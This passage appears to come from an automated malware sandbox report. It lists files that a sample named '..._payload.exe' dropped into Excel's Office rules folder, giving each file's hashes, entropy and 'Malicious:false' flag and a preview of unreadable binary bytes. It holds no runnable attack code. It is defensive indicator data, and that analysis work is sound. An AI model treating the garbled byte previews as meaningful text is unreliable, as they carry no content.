                                                                                                                          Preview:<?xmlXlm.a.r...c.U.7R....xQ.~b..FG..k-...".bK....Br{mp....R.kCyt}2.=.U.k...\.\)u.#.7...a..........O&.]...N.P....!"...9.....v$.+.....(.cs.B.g...n.G.DB.b*.s.=.E...|..t..8|A.i.u...D...?........d..X.......*....X.4......Y>..]7..".!..}C#.......k1....E..I..e9......F..UP...%\... .v.fK...a....}..Ufw.`.e.\..P.$.G.n.~.AV:.f:..r./.4..[.x......3.......A.[.G..7.w..}...m..7R.[.m.....Z.p...(]j.Kx..5c.m........*=.SH..l.D+b..E..g.X.I.....L.lpM.'...:.9E.c.x@R..MQz.3..!zm.kQ.Y/.$.>.<.lE..>.Y...:...M..............E.k..n...~E5W@...n......U..Gn..k...<..m..p..'%......../3.s-....5_.....j.y....(..f......V.6q.......L...u....}..2..X.h.\.%.4.g]|.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120616v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):819
                                                                                                                          Entropy (8bit):7.728864941364927
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4Ult3y46PZtV3ZQ9N9HlSvVM3I2GLhc0vRECObD:44aBtV329N9HlSNM42cc0vREbD
                                                                                                                          MD5:1352E386F488D1273AA0622E72DECBCB
                                                                                                                          SHA1:D2E8700E1B9CA0280B82F6791361D6449712A65A
                                                                                                                          SHA-256:8DA7A424BD1505EC7F2895B44BC067ED105E9148428842295C7A6E5CF5D3D904
                                                                                                                          SHA-512:E491E7ECB5BEF69AC4166E97C5C08C00F6D7F97CB30E15D525C96642489C06C48F7B8DF6E3FB2B619ACC511F610DE045224C392F766C10EBAC67291D708D45CF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml6.!.D.Z..L.>.Q...vOZ..}.8T8.....'...*$..1X.}..&..c..._c..!.c..\...._.....a.+..BZI..d.....;._o.@@...t.S.... .D..[...;...y.....Z.....{.^.{i...9..V.....|..GR..J....[.n..o..w.b;...!.7WD..7..v.G.'.&.[....i..7...<..}.....M.0.?3...6....vS&...:.#@.~#.v..0<2#Z...P.L....p>.`......3....B...gl..\.7..L..].._..i....m.......1../..^.....c..A.@.lT..]...jb.0..u.ix..7.q.........as..(rX...Y.n..k.....E9..v..d..g.Zf.y..D@.E=<....0.i6Yj.x-#Fa.x>#..>-Dy.0E..S][.b~..G...,e7..^T.....&_y.+..4#...7....*./]^..l.G../..*..I.?U.-...6.....`..[..R2..6......+....\.'.P.w..7.$....z.~.....%.|....].g*W.M:...rk..$..(..T.3w.=S.SX...2...R.m....U .=.c].R.`2....`.R.<....+.S .[R..Fi C.W]o...Y1.l.....O...=...X....I..../.8..V......E.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120617v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):760
                                                                                                                          Entropy (8bit):7.711523699719779
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:oWQFG2U9FTmZ95gL5cyImaBHOALW2WK8sht18nWkRSWGfSLLq5bTcii9a:oWQFG2UDTmD2aBHOALWvKZv18zRODbD
                                                                                                                          MD5:A0D8DA94183F979A46500A00AFBC9F6A
                                                                                                                          SHA1:51A77F4129C7576207B7C277FF99EB305A84048A
                                                                                                                          SHA-256:EAC88E8F02452CBCEF60ADA74F0C576267E18DF94C68A56DE37F24DD27E281A8
                                                                                                                          SHA-512:AA1FFC3662F61EA7908CE436E4398909569945DB2B6BE597C883AEE742BD441F266BD4084FBFE2688DDEEA04DF64976E97A2ECAAED6ABBAFC2F90035F624DE32
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml'...r..wa}.l7.2..W....&sk.....K...N*z..o8jF^..S~.5.X.7].."..5O=._].B02..Md...%t.S!........9....q9w......@..6...r...*H.D.T.y..d.Tb..x...6..&..v....{.<:..._:p.........4.Z.j...-MAj7....p.1W..y.|.z...y.0.-.a..L.|.......".;...M.. .DT..<Dt..+.I6..=f......{......T..p.bjnu;...G.....wt.x..T....]/.Kj...........X...P.9....... .Fu7..)..@....BE.."....p8.>j....oH..V...l.i.t.N....1...v..h.*@..SV...E...8.j@w....\..")2J.4..3.|ow......f....M.[.d..}U.1.Ac..g..x...X..3`.0%..Z.O.........{/..mQW...x;..M..#A...o_R..-..4.4c...jhZ.......:M..(...X._K$...B.>.t.].. ........{u.l...k...|.K.].}3....4.1.@....d.6G,i..3\Sfpw.]?....>.....0X.iB+o...waf.&.R>E..a5\.6.L#(..<.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120618v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):819
                                                                                                                          Entropy (8bit):7.780367761227426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:1vM7FYTPOwZbYraa4hcjK4OBJr1YLNluqoLWh/dXMw1fOWXBcPLq5bTcii9a:JM7FYTmubYZCP4uyaqWWh/dBrC+bD
                                                                                                                          MD5:90F94D162282C9B1F73B7267D79D1AAB
                                                                                                                          SHA1:AF3B2B89EEC60CCC822F9727FF2ED365B935FF67
                                                                                                                          SHA-256:798A9B11D2002889DAE0D08BFDCB48787864C5D3691D7356B9CD1D83B09ABB25
                                                                                                                          SHA-512:0010AB8EF46EE16B84063B081D13F06DA90328E21D09D41BCF87367D04CAD784BA439DE4B615F06F0094732361B42B10CB847979CB14770F9C8B2F82562E77B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..G<.0./...........6;.c5D.7.Jq...6.t..4T..@....r..-..tjhc........+.{...#..-.T.p.e..._;.vbJI....ra^.e[.y...O..+x.......:f...Wt~.(..5...;.O......e...>1]).Q.....)..U.H.../..W.'N....4.E.Ab"..}*..L...+2B.Z..H}..U;!.b...d.......L......(1.]..4.R,Y..v...TQY...@|U.5`...Bq..=...5mD..&..E..y.J.^IY.kb......g.....].,P..EM`Y.....j.i>.Lp.....HV..........nS...u ...."..J9.A....I...(.S.@."0.%!... ....\...e.>.[=,...3...?.K.$.%d............L|!...S:,EK.r.:....+.&y..-..A..i.....b/w.../.....q...-TK.d*......|......S.s..j..XY..zw........._.W3%..\%.Jd..G..........l?(...B.~...qe.e...7..cw.#..p"~....8.4...EFN........R&...0W..........sU."...3f...R.*.[X.{.....2.)b.Q...Ek.;.L}z.=8.YG...co."q..x....h...._:.8..X.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120619v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):740
                                                                                                                          Entropy (8bit):7.727502389120131
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:uIJHzAP++ucyDtsXWcSLTaaX/IX2qHSuL+trwm4wMEMgpMBquTDKdejUonNcWLqt:vhcJIgbSL2mq2qHMO8ugpnaGeFnwbD
                                                                                                                          MD5:8395F9E91DE9014F2C547FAF63C5DC7A
                                                                                                                          SHA1:ECE9586B78F6D50DF1196BF4C92E4E5E5443A523
                                                                                                                          SHA-256:C9BBA664D4FECD2866E8EC07B753F9F83DF7663B7798E7B2A7ED082E482E2803
                                                                                                                          SHA-512:27EC3F2E4543A13DC34F0FB79694C2880F189392AC58845C2E54FE694354EC54D3BA1C2766FC309244A6E5645EFC093071121734487A5C125F0BA0AD67E15C9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml"=..#:.^a.........O.......2K.........J.d....FW..Wh.."...{...M....x.e....*..bt...+I{..Z...z..B.j...7...w....vw.....B.Y.p..syw.d..D.<B.#....O..1.....a@..*.kqf.78..{n........3..K.).r.j2..N;.:/.sEm.....`.|......r..6....x..U.Fl.-8....OAH....)..yaZt.........!$...Z.F.....1...qP ].J.-..`Wv.. ......fg!....O.l:(.,.h..,.....E.l...4.#tS.=.s..A.Y+`.X..az..Q..5."J.2..&.uN"\.Jn1..*..x.H.....W...Kt..3..wF.p...|>a..C#....Fh.G7N....Qim..X.y.....]h7!....G[fZBu....h...B....1.]......X.e...?Nh...3d........g.=Y..P.MT.........?5...l.6gD.~.....2....t...^[..x.;..X......v.i`.Jmg^.4..[..8.....8A.y,..s......a.G...Fi38..].`......p..#V.W..Y}XUphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120620v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):802
                                                                                                                          Entropy (8bit):7.740941543770862
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ewtYcM5krn04WnjzB5+Car7PdfOJnomtMctvEkMbD:HqcMQ04Q95+XzRiBtntv3GD
                                                                                                                          MD5:EABAE491A7EB87CD678DE068532E4A72
                                                                                                                          SHA1:9FE2C6400D5E30EB962464976BF3C8DB69C800A4
                                                                                                                          SHA-256:48242E1774CE8D373527FE8223B64B18467CBCD01189B649450364D160CE1F23
                                                                                                                          SHA-512:3B8B134DCBA394C54A8CFA934D0C82F7FD34A6208ECE515C684820AA2B04557C338A16D8AD6D548F10CEB3EC42682DA4019B861E7A1ECAED891001E8E6B44B57
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.SU..e.#'..p..R.e._`...v$..}.<:.4#M6>...:.#.1. ).....,..>Q...y.......%;aP...Z.....I..oM............0....MS.k.....O3E3.......C...v.0.k.....b...z|.....X...s..R~.X......3....1IP....H...!l.A%....>..m.l..`..[`..ZAQ.....$.p..hsNg..D..j.H.;...Eh3.\2.: ...i.d.VM...eH.5...$..K..^h...tC..D..f.......-.0....e....l..l).k.s.B.........:BP..'.k.|v......8...i...'.1.......0.&.x.........i^T..D..9.(..'....#.._..S`.-....7*WMq.....yg.QGHN......D..@`P..a.....+.6....0..>...\.......&.......z.E..:..L.......N.5q^..d.2....x..M.Q.....P5"h]...[....<.4D.ZJD.0.......u...lA...([..~H.h....NNb..~...Z.8..1.T.....S....>..Li.(.Co.d.@...O. M.u..@...@. .).._.O-....N..,RW.-jHh?x.~...5.....,Rj4.=..TR........u...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120621v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):748
                                                                                                                          Entropy (8bit):7.692347976649353
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:WEr8v5qoSTz9rDj2bFYwN043R8UVnWUJYlgIw8Z/4YmqRgWOjurLOb4L1Aq5bTcq:W5YoSheNUUVn1JYqkS9juubMbD
                                                                                                                          MD5:36CFDEEAC72F7E134C307762F3476498
                                                                                                                          SHA1:C678A3CCDCA85C7433B2C9491945CFA67A556AA1
                                                                                                                          SHA-256:65B37ACAB283473D76F2D336AD2304373995024BBCAAF57D9D20D4B827C89ADE
                                                                                                                          SHA-512:77E6F589D86A37D2D68DE65A2E1C04C1AF6F62DEB7F35EA574B62940977B61B369E1302418B91237B7D5B697E613A157D6737F914068ACE956658EDF1EF52306
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.(...A9.<...5yL.]3......Y.........2.....9.jCvJu.)_..\......+.K.C1...cf.*.Y..........)MQ.....#A..3.L0..jZ!.q..j>.l.7<..f.8..;P....I....2..}......Yjl|2.<....[.b1.<.J../zH...M.y..s...l..+.._..9.Mz....h.....#n.....Hu..dY"R.B.@5......IqyU.8\........z.`.(.`G.).J..ST.y....pWQ...Z...........S.}O...jo.^e.=P....[..>C.h=...:.WO...X.M'....Z~....1...B..%..*hj..;'..<_..n.[t......^N..6h.M^.....~..D......./r.5.d.9?.,,.....M.R....O....Q....1...u.]7q.P..).]k..b......[[R.A.h...,....9.5..J..DtN.VP*.F._u.&7K.E.z.f.z.......W.G..8..Z4,a....0....[...1X.7.;..Z...Q...7./.-.....{..y..31z.#yu.V...<i...>..v....p..+. X4.w!...D.'......N.3.m<.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120622v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):810
                                                                                                                          Entropy (8bit):7.7108450191506765
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2mz9rwslyzDjS+5xZrs8QIpXaAIwFXZmbD:5rw7zDu+DZw8dXa8Z0D
                                                                                                                          MD5:FA78CF9A8F591BEB245042AC522A68EC
                                                                                                                          SHA1:E0D801157E9CA316C5812B51E307D6B61F044964
                                                                                                                          SHA-256:7ECFC21EB579683B85A6F90FF1A6FF17FEE55666D5DAD4C572CDE6BB9EE5FB89
                                                                                                                          SHA-512:6E25A263DA57976D6D2E103D35F8CB8FA9C7E32CEB04ABDA2A7546340A7AEC1C9437BCEF5163FA85300A34F38AA105F43557CC07F8961B08AF9CA0BA500CD054
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...d....h..0. 9D...9*...E..?.{.#...zS.....I..k=9..P...8.N@..3.......d.0.....7.s..y/..\M...TG..~."m.....}.L....r.(..t.G....W.".x@\:......?...F..P.`...3p,...kXX8...6.d..d...{8O.n..N..ZgU!.PO...<..)........1f.E]L.'..T'.A..6i..O.=.gR...G.(....8.@r,..s;.nCc{`.*..dV.....d.9...V.!.......T.....@.......r.\..?2.%}.b<.14......p-.v....W.G...........@'..Xo"...x38.L*..!i@>. ....j..L.m..ry..y......j....~~..Y.p.Y.D..-V..t..z...Hp%.`.........0~...R0h.!.m....'.Eb}.W.Q....3..}......db...K.....z..z.`..u..@.j.2..+.k.i.1e...W.......U.y..Z...G0M..bI5Z..b....#.vQrD.s.....%x..0.]v..O.b..t.l.2X...^.1}..{'.)..u~...r.&H;.v.q!.*...,|,..,....%?9....j..8......b!...<..L^.....d....2P.g.!.g... ...s...W.z...A].].9...4YphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120623v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):797
                                                                                                                          Entropy (8bit):7.763479444758413
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UU76A2+5kHNT92mWtCY5C7fs9Wz6kihpcbD:hmL+5292mZSC7n62D
                                                                                                                          MD5:427ADD7E0595DA7AF504978E56CE5F54
                                                                                                                          SHA1:532114B15BE2D92D0F029D718046F3BBA72AB0C7
                                                                                                                          SHA-256:8B0B67E885BF2D8451170675404F64F42A0C83582AE21812648ECC0611007DF1
                                                                                                                          SHA-512:84B9E4BF424EFABE2F6177FBEC5125D71F271DEF91CE0DFC8024504D4280ABB3A6C78B699D20229CB8CD82D2E2380F704F2E8E003E9339E32E2588D59CDD43E2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..(..Y.\2U^'o.T..sa..=.(Q+.8.x0.!........n..N...m!.Z5#....A.9.0.mN@.]..m..?{.G..;4.T.-..2.R.kja...UG..I}P..@.=.*....-....az&.~?..4..[Z.._.`H..J.....@...@)s........gIl.....i...3.c'QM.|.;...?.@........i....G...*.F.%...R...Y:I...@.P;..}R../.oE?w.....:Vo.......W.79.{.1...Z..A...{..5...;......<..u...i.p......"....,...F. Zu...us_.KY.lgY.........@..|(...z.... ..M...Ds..Ls...S...4C5*.....#.o..j..^`.A.H1.\!.p...T....`.S...2g.Q2.N.&.oxkreR".d&..#....e.d..@.D.-.....P...r.l".+m...(.B..wI..fy.!:G.x...*..8A..MxW.<^...L]>h.OE>,Or....b.l$.'..kZY..RG.`.d^..f.O.y....v..$......^..L..#y....5.+.....i..4....l,.....<.@B.b<..K.>.w.U ...e..2.....:....~.....A|='~.)..v.....z..nEP...n.g.Vy.....X.1.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120624v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):827
                                                                                                                          Entropy (8bit):7.712676817517149
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:NYASLb12tpY9kjGyoUkl9ItbOhINptEPS9Z1JYuDhEASOOKE3qKIBcj6U4q5bTcq:NYAC2tpY8GfmbxF90X8cjpbD
                                                                                                                          MD5:5582AAB20217F51AEC028396B567791D
                                                                                                                          SHA1:06D6764DD015DE89FA34B0F5867A205C3E09E00B
                                                                                                                          SHA-256:4AC59C5BBA72C213ADBC893A946E21E75D8BF975FD3BA9BF2D01FA41B3DF345C
                                                                                                                          SHA-512:5485EC866F2ADC6FB52DECF7B81433404C3AFACC4660D4DD77611F3DC1682686A2F91981DE7DB738835FF59CF2ED4CFB311202D0C60C9468B191E710590988E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...^...^..0..c.8R'..^%...9~.f5.Yc.25v......L.=y`2...e...mlX\.6.a[}F......[=....@.P|.........b......zy7A...G...;....^u...H.."..wDL..%j.{]....* .........y......d..w<..W......k<1~..H}5!Y.S..tr..fi..i=..V..T..FS...{.']....V.....?NE...)./.f.......oy."......V......Q..[..h......;...&< ..s..Fd$.u....o.f...=.x...U..5...<..f..t...+.%..(.>O..h.7..(f.H[......e....[ Z.%.z..26H.....NQ....4....."g+ZG.D9.u."p..G18..Hu|........s..|./.e+v.U..,p...E...K.2p.....,#.;...+...O.paR.p..3zE.>.u4.{j....0De.....6...D_..o1?.......9.../.9.doT..*..&^.....+.-oIQ[....e9O_.t.....R..H.8v....)H..........r1@...C...h.G...W,...g.b.)..X&b.7.)+$O......D\...7..../C..+A.m.....c.....n/v....=%.:=Rk...v.$]y.ao..8....8.".q..k..)K).5....7..?phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120625v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.727767237650927
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kvra9f0Uc6Sxl+V2wCT04p1L3RvywfM/5aX4xooKB5lbNc4ysFUANIRZc1wGcKrE:Sad08I7Tk/ccod5cV0egK2rWtZtbD
                                                                                                                          MD5:1BA02D3F6A535DBF8FE9B9B1CEE4F18A
                                                                                                                          SHA1:61344D4300050458BE9EE8F4C6B31B54FB69D104
                                                                                                                          SHA-256:86A7FBB433A6B3DDC2697173A9E11366F56866E7E776D5F2A308FD8E28FE591D
                                                                                                                          SHA-512:E1B228B390BE181A14E0E18D4C58C6E5B2DA2E38F002BFC7EF82DBC33549B79C49BFC119A248DC7534ED25E432A7BF90DE7A57C6B9AE0879BA89283117C09F82
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...J.3)..'mf.d@..U...d..zp.=.....c.....g....l.t.......P.UV....I...r.......0u.... .~.S.5..m.......>..%)..P_B.i.gE]fV.=..O...CL...F.O..3.A.frU..Pq.Q.[.vsmzx...L}o..t.x..0.V.....MD.mhG@....C..-......zi!v....p.._.Q.._F...!NX..&J.r.wu../.......hp...I..(.{.oa.().F'.....r'...N...(....F....D..{..b...b.....,D.3/.....frm.L...:.......dl6Z`...C.^..E.......{....d!....Eyt..T.....~......%#.&..c".......m..wku.}.a...jKV.%.KEr..9t..'...E.g...%..1'.....>...)L..'.w.l]. rv...X...."aY..7|E......D(.2.7...,....G^M..Z@......$.k..C....`>.3........o...+Ilf..I.V......!..6..u1.-..An.Xl..f$..-o...|h..h..`...47R.:Te.\...N..\-..o..sL.Q..+....<.....=.h.....(....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120626v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.735675370219524
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:kf0WnLbo5A/AzuP/1GLL2PnUDYVq2nhqVguE+cZbD:kVIgTgLL2AYVqCqVSZD
                                                                                                                          MD5:51A1D37DF078E4C90E075BE2D95357EE
                                                                                                                          SHA1:D7FBA41E69CA43BCA399624559EDB67C46AE4898
                                                                                                                          SHA-256:1E69714E1D88C5BA54563CE6A4CE25C3AE78F5515AC520E05D1EB0B0C7000E65
                                                                                                                          SHA-512:F37C9DA8DDE696F6E2CC000ECB3331E1E5BF09732EC59A1891E323EF494732A03A24D11AC8FDDB487E364A6A0B7D984AE605FC2D496AEC0FD0DAB27A6C0BE5D4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...\.T|..a../.........?....PW..]..r=././G.'..S.D.....l.:Y........Jf~*Z~cg.,,..3H...!..n.bf ......Be..u......57..Wb.~X....3NRE'$...n.z.3...o.0k#G%]W........$v....4#`...+....Y.8.~7.HF.F8.4..Z.6...L..x}.#.4..K.\.l.4.N....b......FM.!t+ ...{......Xq......k....i..m..@...5.}K.w.Ydw...2XsH....^9.@...bpe......1......A...9...{a...^...E.OmY..y.g.%%..A.....{R......?Q.\5...|.|..Oo.K.....Ax.I.....8r.U..Z(....1D.......koq2L.bp........Y./`..=.kh..7s;5.Rav.(+o|.=[V{<..U...CD._05..k+tu.Z...mt...7..:G.-.......V.l....J..-.V.!..D8..:.o.c|8....u.M....._.t...;.xs?rXV........kf..r.........<.V|.B..Tr..)....1.."W..............s./...I%xlc..B..KXU>e.GKc..{`...L}.^.^hG.....A.+.7U..k+&:;.n.s.D..e...]......+V.2.R.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120627v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):737
                                                                                                                          Entropy (8bit):7.708861938011636
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TsCpJ4+w8ka5RWUOAAnzMZBoNgCqlLw8abTQRvrmR3vg0Mec7aJRwswJf5vLq5bj:TjpJWWRWIi5qqPboPperJRY8bD
                                                                                                                          MD5:A35435F131F8C10A5EFCD0D1A439591E
                                                                                                                          SHA1:5DC471F03617AB1B69037EEDA6D10C4550B17D5A
                                                                                                                          SHA-256:E0AD145924F06EFD027A422503B39D3C5FD2E27DBDFD5518E73CCF4D7464CFA0
                                                                                                                          SHA-512:A54D6B647A204F26874B3DA5BA3A444EE5F04544C344E5EDB054ED5C3D8CB3A32D46ACC26C664188E5A603516A76E116FDE355CD76DE442F04F0701C0ABE365B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....N.+.8n.e...f.|.....Jn.I'}..+.Y..........Q.=.....OE.:pm,.......J....z.......G..M...z......v.....$Q...>.*...R.s.+...."..[..T!....P&.8".B...8D....n..Qh3..^lr .Q.....z!..m.s.)j9r...G......_..."9QE....-.7..+A.-...LXf;.+..)...m.4.!.i..A..y.AB...<.;c..~.C.>M......'..A.0>..K> ........;x..-.....^._w$.G"...U.xi.S....@..FM....B...i.J:....>...tD.....3..P.J.&.^(...V...e..g&6j...T......GM./.h.3 ...!.R.m..p..s.uW.|...Y.....;...PQ...............=...(..I.sPHxY..}..n92....8JU..O^....)......Y...H...[..[.$."?.=.B..a9...4.t.....+..#....5&.-.....J.!.....q..........Tv..e...y.Uw.O.D.QMw.,!.......6......v9W..Q...tB.f.N..R......phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120628v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.700463905860841
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:eXyd9B8SCQ8J9K/aJJZSfld4Ou4VDzHj53bD:eClFd8LK/w+fvu4VfHtLD
                                                                                                                          MD5:8A57F6D47D4F3CB25D4489DDFD7A38F8
                                                                                                                          SHA1:DA7A479764000FA3C1B0EAAC1B0CEB97522CF41C
                                                                                                                          SHA-256:6A9C2E3665925B848FA7B3E923D1AC511FF24437592FB0BA2C71E8A57020F890
                                                                                                                          SHA-512:702EDC4D7979EB95F7056E3C93EE6AFB9DE55B70340BB936D4C3E67B4F28CECDA842603CFCEDFBCA4680F1EC4C4D754E28399AE47113D209CA2013DCB2D4E35C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml........@.......q..<Y\I...c...Bx.A,..........]i_...|..D/o.'....>7..=.F..=....l.....(.{W$.s.T...3......f......5{..1.w....E.t.B.n...#....u..8.=b.m.......<.%..g6.k..W.;F.J..)....R.-..q....l]d7..;-.1.=..z......4%.....}+dM...7..&.j&p}W.r.......Iz._........t.........4;@......_[....<...%c.2Y..nF.......8...^.\.D....B{ZV..]+.tq..N....%.....5F~9^...%j..Kc.I....K...Q....{2..D0.-....h.AC..%....hH......qr&.Q.o.[^....i..1WZ..!B..g......=.....z..F.&...A.0.]g......d...>..Q4...8......qJ.$.;0...t......x...[a.5m......<.C...^...rK.U...g.J.db......'....2QH.7BO...s.?.z.y,l|.....=...6.o.u..N..A...N[...q=.......0(...U......v(.)..C...E....l.y.B....b...=..t.Z/.+S....]..wv&...,.5k.F.J7;.P.....%.r...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120629v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):761
                                                                                                                          Entropy (8bit):7.698338563632052
                                                                                                                          Encrypted:false
